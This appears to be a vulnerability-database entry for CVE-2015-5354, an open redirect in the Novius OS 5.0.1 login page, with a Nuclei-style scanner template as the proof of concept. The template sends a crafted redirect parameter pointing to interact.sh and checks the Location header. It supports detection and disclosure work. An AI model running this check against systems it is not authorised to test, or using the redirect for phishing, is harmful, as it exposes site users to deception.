CVE-2015-5354: Novius OS 5.0.1-elche - Open Redirect

2025-08-01 Novius OS PoC Public

Description

Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.

PoC

id: CVE-2015-5354

info:
  name: Novius OS 5.0.1-elche - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of Novius OS.
  reference:
    - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
    - https://vuldb.com/?id.76181
    - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
    - https://nvd.nist.gov/vul n/detail/CVE-2015-5354
    - https://www.exploit-db.com/exploits/37439/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
    cvss-score: 5.8
    cve-id: CVE-2015-5354
    cwe-id: CWE-601
    epss-score: 0.12523
    epss-percentile: 0.96016
    cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: novius-os
    product: novius_os
  tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a0047304502204efd077a54f0fcb235105e759995d1f5af1903124a7b35da19b0a5cfe448e2cf0221009bff12769bdc93c23f94f1294076d010adce49febf97ca9893f13b1d064aa0bd:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities